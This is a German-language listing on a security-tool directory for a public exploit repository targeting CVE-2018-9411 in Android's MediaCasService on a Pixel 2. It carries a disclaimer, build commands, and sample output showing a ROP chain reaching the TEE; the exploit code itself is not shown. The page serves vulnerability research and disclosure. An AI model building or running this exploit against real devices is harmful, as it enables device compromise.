Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-9411 — Exploit-Code für CVE-2018-9411 für MediaCasService | Kitploit
Tools/GitHubGitHub/tamirzb/cve-2018-9411
Android-SicherheitSchwachstellenanalyseExploitationLernen & BildungBinary-Exploitation
GitHubtamirzb/cve-2018-9411

CVE-2018-9411

Exploit-Code für CVE-2018-9411 für MediaCasService

Repository anzeigen
521413vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-9411

Exploit-Code für CVE-2018-9411 für MediaCasService.

Beachten Sie, dass dieser Exploit nur zu Bildungs- oder Verteidigungszwecken bereitgestellt wird; er ist nicht für böswillige oder angreifende Nutzung gedacht.

Der vollständige Bericht über die Schwachstelle und den Exploit ist auf dem Zimperium-Blog verfügbar.

Bei Fragen können Sie mich gerne auf Twitter anschreiben (@tamir_zb).

Build

Hinweis: Dieser Exploit ist nur für ein bestimmtes Gerät und einen bestimmten Build ausgelegt - Pixel 2 mit dem Sicherheitsupdate vom Mai 2018 (Fingerabdruck: google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys).

Um dies zu erstellen:

  1. Laden Sie den Android-Quellcode herunter.
  2. Legen Sie dieses Repository in AOSP/external ab.
  3. Führen Sie die folgenden Befehle aus:
cd AOSP
source build/envsetup.sh
make cas_exploit

Result

Ein erfolgreicher Lauf dieses Exploits sollte Zugang zum TEE-Gerät erhalten, was durch das Abrufen der QSEOS-Version demonstriert wird.

Beispiel für die Exploit-Ausgabe:

[+] Prepared descrambler object
[+] Determined small heap address (address = 0xec9d8000)
[+] Prepared remote threads
[+] Found target thread (stack address = 0xeb42b000, libc address = 0xec51d000)
[+] Copied data for ROP chain
[+] ROP stack written
[+] Running ROP chain...
[+] QSEOS version = 0x14
Tool herunterladen